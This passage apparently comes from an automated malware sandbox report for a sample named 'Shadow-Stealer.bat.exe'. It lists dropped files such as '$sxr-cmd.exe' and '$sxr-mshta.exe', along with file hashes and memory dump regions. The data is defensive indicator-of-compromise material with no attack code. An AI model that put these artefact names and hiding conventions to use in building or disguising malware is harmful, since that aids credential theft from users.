SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD594acf78e23b061d2e4c4ac44dd9ebc64
SHA1e1f9ec9d6e710d84f7514d7dba61ac612fd322a9
SHA25699d45576ebc1c5e98843594418ae66ba65dfc9983ac3634509f9009dd99f9ec2
SHA51269e1d3a6aabcee1d661e5d97c2a7f6c5a5f6de616f69aada789c401be3a8b2ca9758551992595573222b319b17ba1d83753365ad6a68b1d584150a17cfc07ef2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5196b1dbaff732636b069bf58de959efe
SHA1987a287689b564db833b218637745b47a887ea47
SHA25648413ff14f29af3b66678c40c46091c4ff71015f5ed3c91104d371fe12a304c8
SHA512fea45433b06e21561f0cda697538df4c8e85b1bd401c6f92cff967c42d15ac3f7c1c15f3cb84cc07c7b68dcc29ffb9b3189b5343ebd300dae55e0aa8be200150
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5b29ef581c3d0e11e572a747353d724e1
SHA1d56f295929db4a5bd14936d103a487199f5c8629
SHA256f78f81ab9c22888adbc8fbfeec081a697d991de4cc1a20a958bfc831ef84740e
SHA5128649e18566c1d66dfde2612044070fcd099a146ef9c58c528378b0cf76151cbc4daf811a37c3c342bf4b757fb0e626b37e64271f99a7c28e9c82984ec3f06c23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD55b6a0098c5167cb301633198797f4232
SHA11a5c7859800d6e975dc86190e7026d8c327fa018
SHA256c84796f28de39bdaa9ccea6e02f5a515545c29eabf4fc9993a8b581fd2fbc70a
SHA512f9f619cf84b3d9f8315d4486787a3dd13a58fd6e7cf837f237564f9dee376f7255b88c80c5c84414e00e329c6a463d8283d3ffeda90c069184dd5eb2c8cee338
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
14KB
MD599bc31e04db1d9a24cf1dfa75732f3f0
SHA16c4dd942cb32bd693fe3e77a6e399d3938921ae8
SHA256fecd95c2baf6e6de1526bd23c537c1baf54c1a70f78da534057b60179a126d9c
SHA51205c1808f1d9763dcbae1d675ae5d59142bc3b784be2c3938cafc388c3a73fa923813cb4d8fa1969d205179dee2586bb87aed710523a66cb92076dff52d3bcb70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD559d37a8c588c83e806678c7fb5d1229f
SHA14396d68567f30f08e08a269802fe3f4784b88c5b
SHA256c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84
SHA51219223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD59a7af7f1f08f7de9da3ba647286ee5a6
SHA1d7a23961ba5f8c4242a03f20686ff516c2ae432c
SHA256dddc3d322b46ec53927c26326a4f4d573dec131fbe668450f984c91c3104a08b
SHA51264b0d94e68aa2d0ee9d02f170de6989f5255c5c57d05dffbf4dbbe012dae43a6f4dbd59c6a85fd2621fb84ae7f4cdf486a089b90e3e6c4fce1b152ba5aa6ba58
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD535745802ec2865acb4c60e651e5a8620
SHA1f10c746a71c2741790aa3f5160ea7d9be1a1920a
SHA256ef386e977e9fcfc811f2710d0d630e23e2278cf9811770da0c2f10f3965b7a63
SHA5120031f739cafa1089dc655a3509bc215fc900c20734507a1b0b69f1ad1567fb2fe4af725360cf952a4689e89973bbd59a53ea6ff8bd6c4c67b9e732f66f14a42f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12abi4ne.xje.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
320B
MD5eac6f5ecbbd53cde039298927fee7bf2
SHA15cf40b1cdb78967fb9a0fd810f12e603885ed0aa
SHA2566bc11fb099fb5db9fe6dce10c8030cd79e72c015a8aef5af223bc0e28a9b09fa
SHA51287d7e5292e815307e05b30cef6546f3235cb425f964ca60f0632dbe2738109d8b0269a49d91567f4a27981e8a1c952f778099819dd2ed1ffb50d241573695360
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
400B
MD5bde548ba96f17ed3fe6405321d275d13
SHA194bd70f0ac8389e0fc44ba781cff12cc7655ddf5
SHA256d60e1b5a036b719b797e9f1b713d61ce1171d92473a6da3cb7686a957439ad9f
SHA5120b5aabfd2b267f0f7b5ea4b5cb0c1f9d1e4c594d97f951bd174dbc3bd268a1c578212b98dc88fa69c42508c01d92ef2353a172cb9e601ea640d711e8a529e3ea
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Unconfirmed 690217.crdownloadFilesize
12.5MB
MD5cf5b412ffc3ce43cd7ddce602fc67f56
SHA1221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA25684ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
SHA512695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
-
C:\Windows\$sxr-cmd.exeFilesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
C:\Windows\$sxr-mshta.exeFilesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
\??\pipe\LOCAL\crashpad_2044_LTYXBSGMNMGLCRBTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/428-658-0x000001DD8A3F0000-0x000001DD8A417000-memory.dmpFilesize
156KB
-
memory/428-659-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-670-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-669-0x00000199BA000000-0x00000199BA027000-memory.dmpFilesize
156KB
-
memory/628-660-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/628-653-0x0000028CBBCF0000-0x0000028CBBD17000-memory.dmpFilesize
156KB
-
memory/628-652-0x0000028CBBCC0000-0x0000028CBBCE2000-memory.dmpFilesize
136KB
-
memory/636-683-0x0000028C682A0000-0x0000028C682C7000-memory.dmpFilesize
156KB
-
memory/636-684-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-663-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-656-0x000001EB11B90000-0x000001EB11BB7000-memory.dmpFilesize
156KB
-
memory/772-674-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/772-673-0x000001C17FB30000-0x000001C17FB57000-memory.dmpFilesize
156KB
-
memory/936-687-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/936-686-0x000001CBEEED0000-0x000001CBEEEF7000-memory.dmpFilesize
156KB
-
memory/984-665-0x00000270F6F60000-0x00000270F6F87000-memory.dmpFilesize
156KB
-
memory/984-666-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/996-583-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/996-582-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1168-690-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/1168-689-0x0000023321E90000-0x0000023321EB7000-memory.dmpFilesize
156KB
-
memory/3408-581-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/3408-580-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/4700-648-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4700-649-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4700-647-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-646-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-650-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4820-571-0x0000020EB0B10000-0x0000020EB1560000-memory.dmpFilesize
10.3MB
-
memory/4820-579-0x0000020E981E0000-0x0000020E981EA000-memory.dmpFilesize
40KB
-
memory/4820-559-0x0000020EB0540000-0x0000020EB0562000-memory.dmpFilesize
136KB
-
memory/4820-568-0x0000020E981A0000-0x0000020E981C4000-memory.dmpFilesize
144KB
-
memory/4820-570-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4820-569-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4820-573-0x0000020EB1560000-0x0000020EB1606000-memory.dmpFilesize
664KB
-
memory/4820-574-0x0000020EB1610000-0x0000020EB1666000-memory.dmpFilesize
344KB
-
memory/4820-575-0x0000020EB1670000-0x0000020EB16C8000-memory.dmpFilesize
352KB
-
memory/4820-576-0x0000020E981C0000-0x0000020E981E2000-memory.dmpFilesize
136KB
-
memory/4820-577-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-631-0x000001B33B3D0000-0x000001B33B482000-memory.dmpFilesize
712KB
-
memory/4976-628-0x000001B33B2C0000-0x000001B33B310000-memory.dmpFilesize
320KB
-
memory/4976-620-0x000001B3431B0000-0x000001B3435EE000-memory.dmpFilesize
4.2MB
-
memory/4976-644-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-619-0x000001B3429E0000-0x000001B3431AA000-memory.dmpFilesize
7.8MB
-
memory/4976-618-0x000001B33A380000-0x000001B33A906000-memory.dmpFilesize
5.5MB
-
memory/4976-617-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-616-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-622-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-621-0x000001B3435F0000-0x000001B3436A2000-memory.dmpFilesize
712KB
-
memory/4976-643-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-645-0x000001B33B350000-0x000001B33B386000-memory.dmpFilesize
216KB
-
memory/4976-632-0x000001B33B660000-0x000001B33B822000-memory.dmpFilesize
1.8MB
-
memory/4976-641-0x000001B33B310000-0x000001B33B34C000-memory.dmpFilesize
240KB
-
memory/4976-933-0x000001B33C0C0000-0x000001B33C5E8000-memory.dmpFilesize
5.2MB
-
memory/4976-642-0x000001B33AC60000-0x000001B33ACAE000-memory.dmpFilesize
312KB
-
memory/5684-2565-0x000002A072C90000-0x000002A072D42000-memory.dmpFilesize
712KB
-
memory/5832-1521-0x0000022FA7B00000-0x0000022FA7B24000-memory.dmpFilesize
144KB
-
memory/5832-1634-0x0000022FA7C40000-0x0000022FA7C62000-memory.dmpFilesize
136KB